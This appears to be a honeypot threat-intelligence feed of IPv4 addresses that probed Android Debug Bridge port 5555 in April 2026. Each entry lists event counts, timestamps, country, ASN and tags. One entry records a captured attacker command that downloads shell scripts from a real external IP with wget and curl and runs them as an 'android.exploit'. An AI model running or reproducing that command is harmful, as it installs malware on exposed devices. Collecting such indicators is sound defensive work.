IPv4	45.156.129.95	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-14T23:26:58.000Z \| last_seen=2026-04-14T23:37:08.394Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	45.156.129.96	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-14T23:24:53.000Z \| last_seen=2026-04-14T23:25:55.599Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	68.183.1.175	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-14T23:26:10.000Z \| last_seen=2026-04-14T23:36:20.674Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	147.185.132.138	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-15T00:04:47.000Z \| last_seen=2026-04-15T00:16:10.398Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	78.158.15.66	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=LT; asn=43700; asn_org=UAB Consilium Optimum; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-15T00:39:40.000Z \| last_seen=2026-04-15T00:40:42.448Z \| ports=5555 \| cc=LT \| asn=43700 \| org=UAB Consilium Optimum	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	91.196.152.195	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-15T02:05:10.000Z \| last_seen=2026-04-15T02:15:23.367Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	91.196.152.234	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-15T02:05:09.000Z \| last_seen=2026-04-15T02:15:19.330Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	176.65.149.227	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-15T05:08:27.000Z \| last_seen=2026-04-15T05:18:44.636Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	64.62.156.108	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-15T07:34:40.000Z \| last_seen=2026-04-19T13:38:47.577Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	64.62.156.112	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-15T07:33:41.000Z \| last_seen=2026-04-15T07:34:50.977Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	172.232.27.232	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-15T15:46:44.000Z \| last_seen=2026-04-15T15:47:52.177Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	45.56.85.254	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-15T15:47:37.000Z \| last_seen=2026-04-15T15:48:39.936Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	173.70.167.127	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=701; asn_org=Verizon Business; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-15T16:05:45.000Z \| last_seen=2026-04-15T16:15:57.365Z \| ports=5555 \| cc=US \| asn=701 \| org=Verizon Business	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	36.80.241.21	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=ID; asn=7713; asn_org=PT Telekomunikasi Indonesia; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=66 \| first_seen=2026-04-15T14:43:43.000Z \| last_seen=2026-04-15T16:26:00.465Z \| ports=5555 \| cc=ID \| asn=7713 \| org=PT Telekomunikasi Indonesia	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	194.50.16.198	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=895 \| first_seen=2026-04-15T21:06:25.000Z \| last_seen=2026-04-30T07:36:05.364Z \| ports=5555 \| cc=NL \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	81.56.72.96	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=IT; asn=29447; asn_org=Scaleway SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-15T21:28:39.000Z \| last_seen=2026-04-15T21:41:43.759Z \| ports=5555 \| cc=IT \| asn=29447 \| org=Scaleway SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-15
IPv4	20.80.83.86	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=26 \| first_seen=2026-04-15T23:39:07.000Z \| last_seen=2026-04-15T23:51:32.414Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	104.236.246.80	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-16T01:29:22.000Z \| last_seen=2026-04-16T01:43:28.382Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	121.101.134.123	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=ID; asn=131706; asn_org=PT SELARAS CITRA TERABIT; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=69 \| first_seen=2026-04-16T01:59:42.000Z \| last_seen=2026-04-17T10:47:27.337Z \| ports=5555 \| cc=ID \| asn=131706 \| org=PT SELARAS CITRA TERABIT	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	72.255.26.161	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=1 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-16T01:25:50.000Z \| last_seen=2026-04-16T01:36:10.471Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	205.210.31.72	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-16T02:36:15.000Z \| last_seen=2026-04-16T02:47:43.355Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	180.149.125.169	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=MN; asn=45204; asn_org=GEMNET LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-16T03:51:01.000Z \| last_seen=2026-04-16T04:01:14.684Z \| ports=5555 \| cc=MN \| asn=45204 \| org=GEMNET LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	180.149.125.205	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=MN; asn=45204; asn_org=GEMNET LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-16T03:20:46.000Z \| last_seen=2026-04-16T03:22:26.567Z \| ports=5555 \| cc=MN \| asn=45204 \| org=GEMNET LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	27.200.38.255	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-16T04:32:37.000Z \| last_seen=2026-04-16T04:42:50.964Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	184.105.139.106	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-16T06:20:04.000Z \| last_seen=2026-04-16T06:21:13.318Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	184.105.139.70	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-16T06:22:18.000Z \| last_seen=2026-04-16T06:32:31.179Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	31.39.70.31	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=5410; asn_org=Bouygues Telecom SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-16T06:58:46.000Z \| last_seen=2026-04-16T09:04:07.365Z \| ports=5555 \| cc=FR \| asn=5410 \| org=Bouygues Telecom SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	171.79.40.166	Attacker IP • ADB / seen in ADBHoney; events=32; ports=5555; cc=IN; asn=45609; asn_org=Bharti Airtel Ltd. AS for GPRS Service; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=32 \| first_seen=2026-04-16T07:26:34.000Z \| last_seen=2026-04-16T07:36:50.044Z \| ports=5555 \| cc=IN \| asn=45609 \| org=Bharti Airtel Ltd. AS for GPRS Service	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	87.228.233.254	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CY; asn=6866; asn_org=Cyprus Telecommunications Authority; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-16T07:07:45.000Z \| last_seen=2026-04-16T07:17:51.360Z \| ports=5555 \| cc=CY \| asn=6866 \| org=Cyprus Telecommunications Authority	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	69.30.150.99	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7029; asn_org=Windstream Communications LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-16T11:46:16.000Z \| last_seen=2026-04-16T11:56:18.019Z \| ports=5555 \| cc=US \| asn=7029 \| org=Windstream Communications LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	116.178.131.49	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-16T13:50:14.000Z \| last_seen=2026-04-16T14:00:27.908Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	123.145.33.251	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-16T13:49:58.000Z \| last_seen=2026-04-16T14:00:15.937Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	144.123.77.108	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-16T13:49:23.000Z \| last_seen=2026-04-16T13:50:34.634Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	171.120.28.64	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-16T13:49:42.000Z \| last_seen=2026-04-16T13:54:50.326Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	220.250.11.217	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-16T13:49:50.000Z \| last_seen=2026-04-16T14:00:01.948Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	220.250.11.80	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-16T13:49:34.000Z \| last_seen=2026-04-16T13:59:53.983Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	221.207.34.15	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-16T13:50:06.000Z \| last_seen=2026-04-16T14:00:23.877Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	221.207.34.16	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-16T13:50:30.000Z \| last_seen=2026-04-16T14:00:47.800Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	223.166.22.67	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=17621; asn_org=China Unicom Shanghai network; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-16T13:49:29.000Z \| last_seen=2026-04-16T13:59:36.153Z \| ports=5555 \| cc=CN \| asn=17621 \| org=China Unicom Shanghai network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	65.49.1.212	Attacker IP • ADB / seen in ADBHoney; events=2; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-16T12:56:54.000Z \| last_seen=2026-04-30T11:27:43.319Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	141.98.10.205	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LT; asn=209605; asn_org=UAB Host Baltic; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-16T14:34:42.000Z \| last_seen=2026-04-16T14:35:49.970Z \| ports=5555 \| cc=LT \| asn=209605 \| org=UAB Host Baltic	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	177.23.43.209	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BR; asn=263038; asn_org=SkyNet Prestacao S.C.M. LTDA. ME.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-16T14:58:16.000Z \| last_seen=2026-04-16T14:59:19.236Z \| ports=5555 \| cc=BR \| asn=263038 \| org=SkyNet Prestacao S.C.M. LTDA. ME.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	176.65.139.95	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://43.228.157.130/w.sh; sh w.sh android.exploit; curl -O http://43.228.157.130/c.sh; sh c.sh android.exploit" Observed in ADBHoney telemetry for 2026-04. events=30 \| first_seen=2026-04-16T15:16:27.000Z \| last_seen=2026-04-16T18:25:19.304Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	198.235.24.199	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-16T21:27:28.000Z \| last_seen=2026-04-16T21:39:13.951Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-16
IPv4	175.107.211.49	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=1 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-17T00:10:36.000Z \| last_seen=2026-04-17T00:17:18.856Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	98.97.85.245	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=14593; asn_org=Space Exploration Technologies Corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-17T02:55:53.000Z \| last_seen=2026-04-17T02:56:58.266Z \| ports=5555 \| cc=US \| asn=14593 \| org=Space Exploration Technologies Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	64.62.197.182	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-17T06:21:21.000Z \| last_seen=2026-04-17T06:31:33.948Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	64.62.197.189	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-17T06:19:47.000Z \| last_seen=2026-04-17T06:20:49.880Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	8.208.121.207	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=GB; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=40 \| first_seen=2026-04-17T09:47:25.000Z \| last_seen=2026-04-20T07:25:44.780Z \| ports=5555 \| cc=GB \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	174.66.135.111	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=22773; asn_org=Cox Communications Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-17T13:22:20.000Z \| last_seen=2026-04-17T13:32:26.781Z \| ports=5555 \| cc=US \| asn=22773 \| org=Cox Communications Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	64.62.197.197	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-17T13:04:03.000Z \| last_seen=2026-04-22T15:08:39.490Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	64.62.197.200	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-17T13:03:47.000Z \| last_seen=2026-04-17T13:04:53.563Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	192.241.144.48	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity,Not Suspicious Traffic; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-17T17:27:26.000Z \| last_seen=2026-04-17T17:29:06.188Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	165.232.94.204	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-17T18:30:42.000Z \| last_seen=2026-04-17T18:40:53.112Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	176.65.139.254	Attacker IP • ADB / seen in ADBHoney; events=21; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=93 \| first_seen=2026-04-17T19:51:22.000Z \| last_seen=2026-04-18T14:51:49.042Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	31.56.209.33	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=AE; asn=209373; asn_org=Swissnet LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-17T20:13:34.000Z \| last_seen=2026-04-17T20:14:40.133Z \| ports=5555 \| cc=AE \| asn=209373 \| org=Swissnet LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	91.196.152.144	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-17T20:50:17.000Z \| last_seen=2026-04-17T21:00:22.401Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	91.196.152.146	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-17T20:50:19.000Z \| last_seen=2026-04-17T21:00:32.378Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	91.196.152.61	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-17T20:48:31.000Z \| last_seen=2026-04-17T20:49:33.408Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	176.65.139.69	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-17T21:42:39.000Z \| last_seen=2026-04-19T23:04:01.061Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	45.142.193.10	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-17T21:16:03.000Z \| last_seen=2026-04-17T21:17:10.819Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-17
IPv4	205.210.31.249	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=44 \| first_seen=2026-04-18T02:11:54.000Z \| last_seen=2026-04-23T03:24:57.182Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	45.142.193.8	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-18T02:08:56.000Z \| last_seen=2026-04-18T02:10:06.235Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	1.27.208.97	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-18T04:24:20.000Z \| last_seen=2026-04-18T04:34:26.516Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
